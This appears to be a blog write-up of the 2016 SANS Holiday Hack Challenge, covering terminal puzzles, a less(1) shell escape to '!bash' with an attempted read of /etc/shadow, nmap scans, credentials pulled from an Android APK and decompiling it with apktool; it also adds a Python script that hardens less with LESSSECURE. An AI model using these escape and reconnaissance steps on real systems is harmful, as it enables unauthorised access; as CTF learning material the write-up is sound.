elf@eb4145ccb6a0:~# find .
.
./.bashrc
./.doormat
./.doormat/-
./.doormat/- /
./.doormat/- / /\
./.doormat/- / /\/\\
./.doormat/- / /\/\\/Don't Look Here!
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/'
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp
./.doormat/- / /\/\\/Don't Look Here!/secret
./.doormat/- / /\/\\/Don't Look Here!/files
./.doormat/- / /\/\\/holiday
./.doormat/- / /\/santa
./.doormat/- / /\/ls
./.doormat/- / /opt
./.doormat/- / /var
./.doormat/- /bin
./.doormat/- /not_here
./.doormat/share
./.doormat/temp
After utilizing a little patience, I was able to figure out which escapes needed to be used where. This led to the syntax provided below. Output from looking at the file provided the key for the door.
elf@0c213e1903f0:~$ cat .doormat/.\ /\ /\/\\/\\\\/Don\'t\ Look\ Here\!/You\ are\ persistent\,\ aren\'t\ you\?/\'/key_for_the_door.txt
key: open_sesame
The passcode to Santa’s office is open_sesame. With that, I could continue to the War Games challenge.
Unfortunately, I don’t have a whole lot of context to this either. I don’t have the ability to do the challenge in order to explain what’s actually happening here. Based on the report I made in 2016, I was able to enter Santa’s office from here.
6.3 Chess? War Games Challenge
This was an exact replica of the scene from War Games where you first talk to Joshua. I remember watching the movie in high school. But, I couldn’t remember off the top of my head how the scene went. Used YouTube to go through it again.
Funny enough, if you didn’t use good grammar the game would continue to say the following:
I DON'T UNDERSTAND.
Curious though if there’s a way to bypass Joshua and just acquire the passphrase. Based on the information provided in my old report, there isn’t anything indicating that you could.
Below is the output from talking to Joshua.
GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE
After finishing the first transition, I was given a choice between the United States and the Soviet Union. Initially, I chose the United States. But, with that choice I was unable to move to the next phase. So, I went through it again and followed the choices from the movie and chose the Soviet Union.
[ASCII-art map of the UNITED STATES]
[ASCII-art map of the SOVIET UNION]
WHICH SIDE DO YOU WANT?
1. UNITED STATES
2. SOVIET UNION
PLEASE CHOOSE ONE:
2
At this stage of the movie, I needed to choose which city to attack. I chose Las Vegas just to follow the story line. Don’t send me hate mail, please.
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME:
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE:
LOOK AT THE PRETTY LIGHTS
Press Enter To Continue
After the launch was initiated, it gave the passcode to the door:
LOOK AT THE PRETTY LIGHTS
Sounds like this door leads to The Corridor. Looks like I have a note in here that states I think the passcode for the door will be revealed once all of the audio files are put together.
6.4 Outatime: Traveled through time to 1978
As I read through this section of my report I can see the gears were turning. A lot of looking through the man pages so I could provide a good explanation of what I was doing. I think I went through most of the options and it didn’t provide much information. This is the part where I decided to check the HELP command in the menu.
Train Management Console: AUTHORIZED USERS ONLY
==== MAIN MENU ====
STATUS: Train Status
BRAKEON: Set Brakes
BRAKEOFF: Release Brakes
START: Start Train
HELP: Open the help document
QUIT: Exit console
menu:main> HELP
Back in the day I didn’t provide a lot of context for myself. But, it looks like the output for the HELP command doesn’t provide a help page. But, it does provide a hint. That hint is in unLESS. It also provides a directory structure. The path /home/conductor/ provides some useful data. Shows me where this file is located.
The hint indicates that the application used to manage the train is using the less(1) command to read the TrainHelper.txt file. In the report, I show some reading of the less(1) help page and find a section for Miscellaneous Commands.
When you’re using the less(1) command, you can utilize the ! or exclamation point with the command issued after it to run shell commands. Utilizing an application that can run arbitrary commands as the user it’s being run as can prove problematic.
This could be considered a good example of utilizing the wrong tool for the job. Considering that anyone, with or without the intention of doing anything malicious, can just run commands as the user configured to run whatever app this is. For what it’s worth, less does have a restricted mode: with LESSSECURE=1 set in the environment it refuses the ! shell command (along with the pipe, edit, and examine commands), which is the documented way to close this hole when less really has to be the viewer.
**HELP** brings you to the this file. If it's not here, this console cannot do it, unLESS you know something I don't.
1/2 cup water
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
/home/conductor/TrainHelper.txt
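The shell escape described above is a configuration problem as much as a less(1) feature, and less ships a switch for it: the LESSSECURE environment variable puts it in secure mode, which disables the ! shell command, the | pipe command and the s save command. The script below is an added example, not the challenge’s Train_Console: pager_command builds the hardened invocation for a help file in /home/conductor (the directory and file name come from the listing above), and audit_console_script flags any less call in a menu script that lacks LESSSECURE=1. The two console snippets it is run against are constructed for this example.

```python
"""Paging a help file without handing out a shell.

Added example, not the challenge's Train_Console: a console that shows its
help text through less(1) can do so with the '!' shell escape switched off,
and a reviewer can flag the weak invocation in a menu script. The sample
scripts below are constructed; HELP_DIR and HELP_FILE come from the writeup.
"""
import re
import shlex

HELP_DIR = "/home/conductor"   # where the writeup found TrainHelper.txt
HELP_FILE = "TrainHelper.txt"
PAGER_ENV = {
    "PATH": "/usr/bin:/bin",
    "LESSSECURE": "1",  # secure mode: no '!' shell, '|' pipe, 's' save or editor commands
    "LESSOPEN": "",     # no input preprocessor, so no filter command can be injected
    "LESSCLOSE": "",
}


def is_allowed_help_name(name: str) -> bool:
    """Only a bare .txt file name inside HELP_DIR may be paged (no paths, no dot files)."""
    return "/" not in name and not name.startswith(".") and name.endswith(".txt")


def pager_command(help_file: str = HELP_FILE) -> tuple[list[str], dict[str, str]]:
    """Return (argv, env) that shows one help file from HELP_DIR in secure less(1).

    The environment is built from scratch rather than inherited, so a caller's
    LESSOPEN or LESS settings cannot re-enable anything.
    """
    if not is_allowed_help_name(help_file):
        raise ValueError(f"refusing to page {help_file!r}")
    return ["less", "--", f"{HELP_DIR}/{help_file}"], dict(PAGER_ENV)


_SEPARATORS = {"|", "||", ";", ";;", "&", "&&", "(", ")"}
_ASSIGNMENT = re.compile(r"[A-Za-z_]\w*=")


def _stages(line: str):
    """Split one shell line into simple commands (lists of tokens)."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stage: list[str] = []
    try:
        for tok in lex:
            if tok in _SEPARATORS:
                if stage:
                    yield stage
                stage = []
            else:
                stage.append(tok)
    except ValueError:  # unbalanced quotes: skip the line rather than guess
        return
    if stage:
        yield stage


def audit_console_script(script: str) -> list[str]:
    """Return every simple command that runs less(1) without LESSSECURE=1 in front of it."""
    findings = []
    for line in script.splitlines():
        for stage in _stages(line):
            assignments = []
            while stage and _ASSIGNMENT.match(stage[0]):
                assignments.append(stage.pop(0))
            if stage and stage[0].rsplit("/", 1)[-1] == "less" and "LESSSECURE=1" not in assignments:
                findings.append(" ".join(stage))
    return findings


# Constructed sample of a menu script that pages its help file the weak way.
WEAK_CONSOLE = """\
#!/bin/bash
case "$choice" in
  HELP) less /home/conductor/TrainHelper.txt ;;
  STATUS) ./ActivateTrain --status | less ;;
esac
"""

# The same menu with less(1) forced into secure mode.
HARDENED_CONSOLE = """\
#!/bin/bash
case "$choice" in
  HELP) LESSSECURE=1 less -- /home/conductor/TrainHelper.txt ;;
  STATUS) ./ActivateTrain --status | LESSSECURE=1 less ;;
esac
"""

if __name__ == "__main__":
    print("weak:", audit_console_script(WEAK_CONSOLE))
    print("hardened:", audit_console_script(HARDENED_CONSOLE))
    print(pager_command())
```

Run stand-alone it prints the findings for both snippets and the hardened argv/env pair. The audit is a token-level heuristic (it recognises simple commands separated by |, ;, && and the like), not a shell parser, so treat it as a review aid rather than a gate; the real fix is the invocation pager_command produces, or not shelling out to an interactive pager at all.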
In this case, it looks like I was testing the waters a little bit to see what I could do from here. Started out by listing the current directory structure. There are three files, two of which look like they can be run by anyone. The other, or “o”, permissions are set for read and execute.
!ls -l
total 20
-rwxr-xr-x 1 root root 10528 Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root root 1506 Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root root 1588 Dec 10 19:36 Train_Console
!done (press RETURN)
I think at this point I was wondering which user this was running as. So I guess I decided to attempt to look at the /etc/shadow file to look at the password hashes? This could have been easily figured out if I would have just used the whoami(1) command to see which user was running the application. Permission was denied. Sad panda. But, life goes on.
cat: /etc/shadow: Permission denied
!done (press RETURN)
Again, instead of just checking to see which user I was running this as, I decided to just open an interactive bash shell so I could do my thing without having to type an exclamation point every time I needed to type a command.
I assume the Train_Console is being run as the conductor user. Otherwise I would have been able to read the password hashes from the previous section. Looks like in this section of the report I was curious about what the ActivateTrain app would do. So, I ran it.
!bash
sh-4.3$ ls
ActivateTrain TrainHelper.txt Train_Console
sh-4.3$ ls -la
total 40
drwxr-xr-x 2 conductor conductor 4096 Dec 10 19:39 .
drwxr-xr-x 6 root root 4096 Dec 10 19:39 ..
-rw-r--r-- 1 conductor conductor 220 Nov 12 2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3615 Nov 12 2014 .bashrc
-rw-r--r-- 1 conductor conductor 675 Nov 12 2014 .profile
-rwxr-xr-x 1 root root 10528 Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root root 1508 Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root root 1588 Dec 10 19:36 Train_Console
sh-4.3$ ./ActivateTrain
Below is the output from executing the ActivateTrain application that is in the conductor user’s home directory.
I had to construct this from a picture by hand. It took some time. But, it was worth the effort. This provides the destination date and time. It also provides the last time the train departed. Maybe that was when Santa came up missing. Who knows. But, at this time I press enter so I can see what it does.
MONTH DAY YEAR HOUR MIN
+-----+ +----+ +------+ o AM +-----+ +----+ DISCONNECT CAPACITER DRIVE
| NOV | | 16 | | 1978 | | 10 |:| 21 | BEFORE OPENING
+-----+ +----+ +------+ X PM +-----+ +----+ +-------------------------+
DESTINATION TIME | |
+--------------------------------------------+ | +XX XX+ |
+--------------------------------------------+ | |XXX XXX| |
MONTH DAY YEAR HOUR MIN | +-+ XXX XXX +-+ |
+-----+ +----+ +------+ X AM +-----+ +---+ | XXX XXX |
| DEC | | 24 | | 2016 | | 01 |:| 02 | | XXXXX |
+-----+ +----+ +------+ o PM +-----+ +---+ | XXX |
PRESENT TIME | XXX |
+------------------------------------------+ | XXX |
+------------------------------------------+ | SHIELD EYES FROM LIGHT |
| XXX |
| XX+-+ |
MONTH DAY YEAR HOUR MIN | |
+-----+ +----+ +------+ o AM +----+ +----+ +-------------------------+
| NOV | | 16 | | 1978 | | 10 |:| 21 | +-----------+
+-----+ +----+ +------+ X PM +----+ +----+ | ACTIVATE! |
LAST TIME DEPARTED +-----------+
Press Enter to initiate time travel sequence.
Now for a little bit of explanation. There is an ASCII train animation here that I have in a picture. The train moves across the screen and the below text is provided. I didn’t want to type it all out. But, I will provide a little train for anyone who wants a train. This is the ASCII art of Craig H. Smith that I took from TRAIN - ASCII ART .
o o o o o o oo oo oo oo}
o o oo ooo oo ooo ooo ooo ooo ooo oooooo}
oo oo oo oo ooo ooo ooo oooo ooooo}
o o o oo oo oo oooo oooooo}
o o o ooo oo ooooo}
o ooo}
_________ \|/ ++
___________ |_______|______/-\___|-|_^_/-\___||_n
n_____/ OOO \_ |[][] |----------------------|----|\
| (_) || |______________________|_|| ||P
| ZOO | -----/====+______|| _---====--||- /
q|===================|_|=_/o====+|=====[__]o====+|==[__]-p\
_______________(_)(_)______(_)(_)_____\__/_\__/_\__/__\__/_\__/_(_)____\
***** TIME TRAVEL TO 1978 SUCCESSFUL! *****
sh-4.3$
Once the train animation finishes its little appearance, my character is in 1978, as indicated by TIME TRAVEL TO 1978 SUCCESSFUL!. I vividly remember that the colors of the game changed a little when this happened, also. Don’t quote me on it. I remember really digging the Back to the Future reference!
6.5 Gone Spelunking
Looks like this is one of those text-based adventure games. A small copy of Hunt the Wumpus, which was developed by Gregory Yob in 1973. You moved through the cave in a hunt for a monster named the Wumpus. Yes kids. Back in the day they didn’t have graphical user interfaces. So, they had to use text to make their moves. This must be one of its variations. It’s before my time. I’ve played a few text-based games. But, I’d never played Hunt the Wumpus. Ask your pops if he’s played it. It might start a good conversation. Or it won’t. Who knows.
Here is the Wikipedia page for Hunt the Wumpus .
I think I played this a few times and failed. Though, I will only show you the successful attempt.
Anyhoo. I just decided to play the game to see if I could beat it. I decided to shoot down tunnel three.
You are in room 16 of the cave, and have 5 arrows left.
*rustle* *rustle* (must be bats nearby)
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 3, 9, and 12.
Move or shoot? (m-s) s 3
Looks like I didn’t hit anything. Next move I decided to move to tunnel three. Must be safe right? Let’s see.
You are in room 16 of the cave, and have 4 arrows left.
*rustle* *rustle* (must be bats nearby)
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 3, 9, and 12.
Move or shoot? (m-s) m 3
Then I decided to shoot down tunnel 10. Looks like that was the right choice because I killed the Wumpus. I had four arrows left and one of them would have had to hit the Wumpus eventually.
You are in room 3 of the cave, and have 4 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 2, 10, and 16.
Move or shoot? (m-s) s 10
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game! You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD
Well, that was great! It’s interesting to see what playing games was like in the 70s. You had to use your imagination. The visual that you were hunting some monster in a cave had to be explained and the user needed to do the rest. Not sure where I’m going with this. I guess I’m glad that SANS is bringing this history back to us. A lot of people have forgotten or just don’t know. It’s wholesome and I enjoyed every second of it!
The passcode to the door is:
WUMPUS IS MISUNDERSTOOD
6.6 A Christmas Miracle: Found Santa
This is the part of the challenge where you go through the last door. Through the door you’ll see Santa. Santa can be found in the DFER in 1978. After completing the Pi challenges I guess I was looking around for him aimlessly for a little while. But, it sounds like I went back to that location in the game and found him.
You start a dialog with Santa and go through it all. He says something along the lines of “I bid you a VERY MERRY CHRISTMAS… AND A HAPPY NEW YEAR!”. Game then proceeds to go through a Star Wars inspired outro with the credits and all that.
Looks like I have a little note from the report.
“Now it’s time for the fun part. Getting the audio files!”
I also have another note here where I told Santa to not get too sauced on White Russians or something. All I can think of right now is, “I submitted this?? Really??” But, oh well.
Part 4: My Gosh… It’s Full of Holes
Jessica proclaimed, “We found Santa Claus! We’ve saved Christmas.” The children were exuberant!
Josh added, “And what a wonderful and diligent man Santa is, Jess. He thanked us so very kindly and then immediately returned to his holiday duties delivering presents.”
But, the children’s happiness was soon muted as they realized that Santa’s kidnapper was still on the loose. Jessica pointed out, “Too bad Santa was suffering short-term memory loss from getting hit over the head with our Christmas tree. Sadly, even he doesn’t know who his assailant was.”
Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?”
Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”
Josh, always impulsive, replied, “Well, Santa is running a bug bounty program, so he wants us to find these flaws. I think it’s ok to attack those targets!”
“Yeah, Josh, but how do we know for sure a given machine is included in the scope of the bug bounty program? We don’t want to hit something that is outside of Santa’s enterprise and cause yet another big Christmas disaster. It’s almost like we need an oracle to vet our target IP addresses, like we had last year when Mr. Tom Hessman confirmed which machines were in scope for our work.”
Josh lit up. “Hey, sis, in wandering around the North Pole, you’ll never believe who I ran into. Mr. Tom Hessman himself! As it turns out, he is up here, and is happy to confirm which IP addresses we are allowed to attack.”
“Well, let’s get to it then. Let’s participate in Santa’s bug bounty program!” Jessica announced.
And yet again, Dear Reader, you are called upon to help the Dosis children, this time by exploiting various servers associated with the SantaGram application. Analyze the clues you’ve been provided on Santa’s business card and the SantaGram APK file to identify target systems. Then, check with Tom Hessman at the North Pole to confirm that each IP address you find is included in the scope of your work. Each server has at least one flaw you can exploit to retrieve a small audio file on the system. If you get stuck, feel free to visit the elves of the North Pole for hints about various kinds of vulnerabilities and attacks you might find useful.
7. Santa’s Bug Bounty
ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS:
I will provide the writeup for each exploited system under its listing.
The Mobile Analytics Server (via credentialed login access)
I found the Mobile Analytics Server domain name by looking at the b.java file in the APK file. Also saw there were some credentials that could be used to login to the server. These credentials were also used to provide the answer in Part .
Analytics server domain name is: analytics.northpolewonderland.com
The application sends reports to the Analytics server using POST requests. These are JSON queries sent to report the Android application usage, activity, etc. Looks like the application generates and sends a unique id of the device.
JSONObject.put("username", "guest");
JSONObject.put("password", "busyreindeer78");
JSONObject.put("type", "usage");
JSONObject.put("activity", str);
JSONObject.put("udid", Secure.getString(context.getContentResolver(), "android_id"));
new Thread(new Runnable() {
public void run() {
b.a("https://analytics.northpolewonderland.com/report.php?ty...", jsonObject);
}
...
Using Nmap, I looked at the domain name to find the public IP address of the Analytics server. I checked with the Oracle in the North Pole to confirm that the IP address was in scope.
nmap -A -O analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 21:22 CST
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.099s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORTS STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
| 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
| 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open ssl/http nginx 1.6.2
| http-git
| 104.198.252.157:443/.git/
| Git repository found!
| Repository description: Unabled repository; edit this file 'description' to name the...
|_ Last commit message: Finishing touches (style, css, etc)
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
|_ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after: 2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device Type: general purpose
Running (JUST GUESSING): Linux 2.6.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%)
I used the following credentials to login to the following URL:
- URL: https://analytics.northpolewonderland.com/login.php
- Username: guest
- Password: busyreindeer78
This logged me in as a guest user to the usage monitor. There is a link in the navbar named MP3. This downloaded the discombobulatedaudio2.mp3 file.
The Dungeon Game
There wasn’t a whole lot of information about the Dungeon game in the APK file. Only thing I could find was in the strings.xml and public.xml files. Found this data using the grep(1) command. Looks like the URL for the dungeon game is http://dungeon.northpolewonderland.com/ .
grep -rnw . -e 'dungeon_url'
./res/values/strings.xml:34: <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
./res/values/public.xml:507: <public type="string" name="dungeon_url" id="0x7f07001f" />
Gathered a little more information for the dungeon game. Scanning it with nmap(1) provided the data below. The port for the dungeon game is 11111/tcp. VCE is an acronym for Virtual Computing Environment. The http port provided some help documentation on how to play the game. So, it looks like the VCE port is how I connected to it.
nmap dungeon.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.075s latency).
rDNS record for 35.184.47.138: 139.47.184.35.bc.googleusercontent.com
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
11111/tcp open vce
Nmap done: 1 IP address (1 host up) scanned in 5.94 seconds
Using netcat(1) I could access the Dungeon Game using the VCE port found from the nmap(1) scan.
netcat dungeon.northpolewonderland.com 11111
Welcome to Dungeon. This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>
Decided to play for a bit to feel it out. Looked at some help options to see what I could do to cheat the game. There is a leaflet in the beginning of the game which provides what I needed to figure that out.
The leaflet explained that this version was compiled by Lance Taylor in C. It’s inspired by the Adventure game of Crowther and Woods and the Dungeons and Dragons game of Gygax and Arneson. There are more commands here named HELP and INFO.
> read leaflet
Taken.
Welcome to Holiday Hack Challenge Dungeon!
Dungeon is a game of adventure, danger, and low cunning. In it
you will explore some of the most amazing territory ever seen by mortal
man. Hardened adventurers have run screaming from the terrors contained
within.
In Dungeon, the intrepid explorer delves into the forgotten secrets
of a lost labyrinth deep in the bowels of the earth, searching for
vast treasures long hidden from prying eyes, treasures guarded by
fearsome monsters and diabolical traps!
Your mission is to find the elf at the North Pole and barter with him
for information about holicay artifacts you need to complete your quest.
While the original mission objective of collecting twenty treassures to
place in the trophy case is still in play, it is not necessary to finish
your quest.
No DECsystem should be without one!
Dungeon was created at the Programming Technology Division of the MIT
Laboratory for Computer Science by Tim Anderson, Mark Blank, Bruce
Daniels, and Dave Lebling. It was inspired by the Adventure game of
Crowther and Woods, and the Dungeons and Dragons game of Gygax
and Arneson. The original version was written in MDL (alias MUDDLE).
The current version was translated from MDL to FORTRAN IV by
and was later translated to C.
One-line information may be obtained within the commands HELP and INFO.
I looked online and found that this was also called Zork. The version from March 4, 1978 has a debugging feature, GDT. Although the release date looked off, I decided to fire it up. Looks like it’s available in this version of the game also.
I decided to check the help command. This provided a lot of information. But, all I needed really was the Display text (DT) command. This will display text for the game. There could be some 2000 text entries for the game.
>GDT
GDT>help
Valid commands are:
AA- Alter ADVS DR- Display Rooms
AC- Alter CEVENT DS- Display state
AF- Alter FINDEX DT- Display text
AH- Alter HERE DV- Display VILLS
AN- Alter switches DX- Display EXITS
AO- Alter OBJCTS DZ- Display PUZZLE
AR- Alter ROOMS D2- Display ROOM2
AV- Alter VILLS EX- Exit
AX- Alter EXITS HE- Type this message
AZ- Alter PUZZLE NC- No cyclops
DA- Display ADVS ND- No Deaths
DC- Display CEVENT NR- No robber
DF- Display FINDEX NT- No troll
DH- Display HACKS PD- Program detail
DL- Display lengths RC- Restore cyclops
DM- Display RTEXT RD- Restore deaths
DN- Display switches RR- Restore robber
DO- Display OBJCTS RT- Restore troll
DP- Display parser TK- Take
Checked the first text entry and it provided the welcoming message for the game. Also, decided to check the 500th entry. Looks like I’m not at the end just yet. His booty remains…
GDT>dt
Entry: 1
Welcome to Dungeon. This version created 11-MAR-78
GDT>dt
Entry: 500
His booty remains.
GDT>
Checked text entry 2000. This kicked me out of the game. So I connected to it again and checked entry 1500 after entering GDT again. That crashed the game also. I suppose at some point I looked this up and learned this would cause an internal server error if you enter a number that’s too high. I mean, maybe. That or the connection gets disconnected whenever you exit the game or the game closes.
GDT>dt
Entry 2000
root@test:~# netcat 35.184.47.139 11111
Welcome to Dungeon. This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>gdt
GDT>dt
Entry: 1500
root@test:~#
Reconnected to the game again and I entered a value of 1000. I didn’t get kicked out of the game. Then I made a jump to 1025 and it provided more data. Perhaps I’m reaching the end? It just provided some text with more character dialog. Decided to go a step back to 1024 and what do you know. I get an email address and dialog with the request to send an email to “peppermint@northpolewonderland.com ”.
GDT>dt
Entry: 1000
The thief bows formally, raises his stilletto, and with a wry grin
ends the battle and your life.
GDT>dt
Entry: 1025
"That wasn't quite what I had in mind", he says, tossing
the # into the fire, where it vanishes.
GDT>dt
Entry: 1024
The elf, satisfied with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.
Sent an email to peppermint@northpolewonderland.com asking for the audio file. They sent the email below with discombobulatedaudio3.mp3 attached to it. I downloaded this into my collection of audio files.
You tracked me down, of that I have no doubt.
I won't be upset, to avoid the inevitable bout.
You have what you came for, attached to this note.
Now go and catch your villain, and we will alike do dote.
The Debug Server
Debug server time. Needed to find it first. Looked around a little and found it was in the strings.xml file using grep. Looks like the domain name is dev.northpolewonderland.com.
[root@test SantaGram_4.2]# grep -rnw . -e "dev"
./res/values/strings.xml:32: <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
Checked for anything useful that Nmap could provide me. The only useful information it provided was that the server has http open and that it only accepts JSON requests.
When you go to the site in a browser all it shows is an empty page.
nmap -A -O dev.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dev.northpolewonderland.com (35.184.63.245)
Host is up (0.087s latency).
rDNS record for 35.184.63.245: 245.63.184.35.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 a4:98:4c:b7:ba:53:71:ce:5c:b0:01:d6:66:2e:d2:e4 (DSA)
| 2048 df:44:96:be:13:c7:13:8a:b4:4a:43:4d:5b:f4:d4:2f (RSA)
|_ 256 b7:a2:a2:cc:d9:84:b4:34:98:4b:74:bc:4d:20:cd:90 (ECDSA)
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Site doesn't have a title (application/json).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device Type: general purpose
Running (JUST GUESSING): Linux 3.X|2.6.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2.0 (90%), Linux 2.6.18 - 2.6.22 (86%)
Network Distance: 12 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So, this is a debugging server. Developers use that as a way of fixing errors in their software. If the app crashes, it will send the data to the debugging server, should the feature be enabled.
I loaded up the application in an emulator and proxied the requests through Burp Suite. Poked around in the application and I didn’t see any requests being sent to dev.northpolewonderland.com. So, I assumed that the debugging feature for the SantaGram application was turned off or something.
Decided to take the APK file and decompile it to Smali using apktool(1).
apktool d SantaGram_4.2.apk
I: Usage Apktool 2.2.1-dirty on SantaGram_4.2.apk
I: Loading resources table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying known files...
I: Copying original files...
Once it was finished decompiling, I checked for the debugging functionality by searching all of the files. Looked like the only file that contained the data needed to figure this out was the EditProfile.smali file. This is located in the ./smali/com/northpolewonderland/santagram/ directory.
grep -A 3 -rnw . -e "debug"
./smali/com/northpolewonderland/santagram/EditProfile.smali:199: const-string v3, "Remote debug logging is Enabled"
./smali/com/northpolewonderland/santagram/EditProfile.smali-200-
./smali/com/northpolewonderland/santagram/EditProfile.smali-201- invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
./smali/com/northpolewonderland/santagram/EditProfile.smali-202-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:285: const-string v1, "debug"
./smali/com/northpolewonderland/santagram/EditProfile.smali-286-
./smali/com/northpolewonderland/santagram/EditProfile.smali-287- new-instance v2, Ljava/lang/StringBuilder;
./smali/com/northpolewonderland/santagram/EditProfile.smali-288-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:504: const-string v3, "Remote debug logging is Disabled"
./smali/com/northpolewonderland/santagram/EditProfile.smali-505-
./smali/com/northpolewonderland/santagram/EditProfile.smali-506- invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
./smali/com/northpolewonderland/santagram/EditProfile.smali-507-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:523: const-string v3, "Error posting JSON debug data: "
./smali/com/northpolewonderland/santagram/EditProfile.smali-524-
./smali/com/northpolewonderland/santagram/EditProfile.smali-525- invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
./smali/com/northpolewonderland/santagram/EditProfile.smali-526-
Read through the Smali file and found some code. Specifically, if-eqz v0, :cond_0. This will jump to the cond_0 label. The code at that label actually does nothing right now. Which is also probably by design.
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->a:Landroid/app/ProgressDialog;
invoke-virtual {v1, v2}, Landroid/app/ProgressDialog;->setIndeterminate(Z)V
if-eqz v0, :cond_0
:try_start_0
new-instance v0, Lorg/json/JSONObject;
invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
new-instance v1, Ljava/text/SimpleDateFormat;
const-string v2, "yyyyMMddHHmmssZ"
Below is the code that the branch above jumps to. Notice :cond_0.
invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
invoke-virtual {v0}, Ljava/lang/Thread;->start()V
:try_end_0
